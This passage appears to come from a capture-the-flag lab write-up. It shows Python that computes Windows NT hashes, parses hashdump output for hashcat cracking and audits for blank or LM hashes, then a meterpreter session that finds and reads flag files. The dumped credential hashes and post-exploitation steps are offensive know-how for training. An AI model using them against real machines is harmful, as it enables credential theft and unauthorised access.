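        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = [a, b, c, d]
        for func, const, order, shifts in rounds:
            for j, k in enumerate(order):
                # step j works on (A,B,C,D), (D,A,B,C), (C,D,A,B), (B,C,D,A) in turn
                i0, i1, i2, i3 = (-j) % 4, (1 - j) % 4, (2 - j) % 4, (3 - j) % 4
                s[i0] = _rotl(s[i0] + func(s[i1], s[i2], s[i3]) + X[k] + const,
                              shifts[j % 4])
        a, b, c, d = ((v + w) & 0xFFFFFFFF for v, w in zip((a, b, c, d), s))
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password):
    """Lowercase hex NT hash: MD4 of the UTF-16LE encoded password."""
    return md4(password.encode("utf-16-le")).hex()

def parse_pwdump_line(line):
    """Split 'user:RID:LM:NT:::' into a dict; ValueError on malformed input."""
    parts = line.strip().split(":")
    if len(parts) < 4 or len(parts[2]) != 32 or len(parts[3]) != 32:
        raise ValueError("not a pwdump line: %r" % line)
    return {"user": parts[0], "rid": int(parts[1]),
            "lm": parts[2].lower(), "nt": parts[3].lower()}

def hashcat_input(line):
    """The only field a hashcat -m 1000 job needs: the NT hex."""
    return parse_pwdump_line(line)["nt"]

def verify_password(password, nt_hex):
    """True when `password` produces the given NT hash (confirm a crack offline)."""
    return nt_hash(password) == nt_hex.lower()

def audit(lines):
    """Flag blank passwords and stored LM hashes, the two findings a defender acts on."""
    findings = []
    for rec in map(parse_pwdump_line, lines):
        if rec["nt"] == EMPTY_NT:
            findings.append((rec["user"], "blank password"))
        if rec["lm"] != EMPTY_LM:
            findings.append((rec["user"], "LM hash stored"))
    return findings

HASHDUMP = [  # the three lines hashdump returned above
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::",
]

if __name__ == "__main__":
    print("hashcat input for Jon:", hashcat_input(HASHDUMP[2]))
    for user, issue in audit(HASHDUMP):
        print(user, "->", issue)
```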
TASK 5 - FIND FLAGS!
1. Flag1? (Only submit the flag contents {CONTENTS})
We can use meterpreter to search for the flag files.
meterpreter > search -f flag*
Found 6 results...
c:\flag1.txt (24 bytes)
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk (482 bytes)
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk (848 bytes)
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk (2344 bytes)
c:\Users\Jon\Documents\flag3.txt (37 bytes)
c:\Windows\System32\config\flag2.txt (34 bytes)
meterpreter >
We can see above that all three flag files are found; we just need to read them now.
c:\>more flag1.txt
more flag1.txt
flag{FLAG1}
2. Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.
c:\Windows\System32\config>more flag2.txt
more flag2.txt
flag{FLAG2}
3. Flag3?
C:\Users\Jon\Documents>more flag3.txt
more flag3.txt
flag{FLAG3}